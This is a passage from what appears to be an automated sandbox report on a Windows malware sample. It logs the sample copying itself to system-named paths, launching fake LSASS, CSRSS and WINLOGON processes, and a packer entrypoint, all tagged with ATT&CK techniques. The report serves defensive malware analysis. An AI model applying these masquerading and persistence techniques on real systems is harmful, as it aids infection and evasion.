C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.scr to new location C:\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS .exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9CA14.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C477.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C852.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C855.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C479.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS .exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9CA14.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C477.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C852.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C855.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C479.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004312)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004304)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003572)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002632)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004224)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004380)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter 